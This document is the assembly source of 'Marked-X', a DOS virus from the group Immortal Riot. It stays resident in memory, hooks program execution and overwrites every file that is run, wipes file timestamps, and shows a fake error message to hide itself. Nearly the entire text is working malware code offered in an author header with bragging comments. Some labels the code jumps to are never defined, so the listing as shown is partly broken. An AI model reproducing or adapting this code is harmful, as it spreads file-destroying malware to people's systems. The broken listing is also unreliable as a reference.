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synced 2024-12-19 09:56:10 +00:00
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110 lines
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; Virusname : Marked-X
; Virusauthor: Metal Militia
; Virusgroup : Immortal Riot
; Origin : Sweden
; It's a TSR, overwriting infector on files executed. If it's the
; twenty-first of any month it'll print a note and beep one thousand
; times. It also sets time/date to 00-00-00 so nothing will be shown
; in the fields when you take a "dir". It'll print a faked note when
; it goes into memory aswell saying they executed the file's not there.
; Urmm!.. Anyhow, enjoy Insane Reality #4!
virus segment ; segment's and shit
assume cs:virus,ds:virus
org 100h
start: mov ah,2ah
int 21h
cmp dl,21
je happy_happy_joy_joy
mov ah,9h ; Print the faked
mov dx,offset note ; note.. (bad commie or filename)
int 21h
jmp makemegotsr
mov ah,9h ; Print the virus note
mov dx,offset society ; to show that we're here
int 21h
mov cx,1000 ; Print 1000
mov ax,0e07h ; "beep-letters"
int 10h ; to screen
loop beeper ; (results in [ofcause] 1000 beepies)
jmp tsrdata ; Celebrate! now put us as a TSR in memory
new21: pushf ; Pushfar
cmp ah,4bh ; Is a file being run?
jz infect ; If so, infect it
jmp short end21 ; If not, back to old int21 vector
infect: mov ax,4301h ; Set attrib's to zero, keines, finito
and cl,0feh
int 21h
mov ax,3d02h ; Open file
int 21h
mov bx,ax ; or.. xchg ax,bx.. but that doesn't work here
push ax ; Push all
push bx
push cx
push dx
push ds
push cs
pop ds
mov ax,4200h ; Move to beginning (?)
xor cx,cx
int 21h
mov cx,offset endvir-100h ; What to write
mov ah,40h ; Write it
mov dx,100h ; Offset start
int 21h
cwd ; set date/time
xor cx,cx ; to zero (00-00-00)
mov ax,5701h ; do that
int 21h
mov ah,3eh ; close file
int 21h
x21: pop ds ; pop all
pop dx
pop cx
pop bx
pop ax
end21: popf ; pop far
db 0eah ; Jmp far (?)
old21 dw 0,0 ; Where to store the old INT21
data db 'Marked-X' ; Virus name
db 'Will we ever learn to talk with eachother?' ; Virus poem
db '(c) Metal Militia/Immortal Riot' ; Virus author
society db 'In any country, prison is where society sends it''s',0dh,0ah
db 'failures, but in this country society itself is faily',0dh,0ah
db '$' ; Information note
note db 'Bad command or filename',0dh,0ah
db '$' ; Fake note
mov ax,3521h ; Hook int21
int 21h
mov word ptr cs:old21,bx ; Where to but it
mov word ptr cs:old21+2,es
mov dx,offset new21 ; Where's our to be called
mov ax,2521h ; Fix it
int 21h
push cs ; push it
pop ds ; pop it
mov dx,offset endvir ; Put all of us in memory
int 27h ; Do it, TSR (terminate & stay resident)
endvir label byte ; End of file
virus ends
end start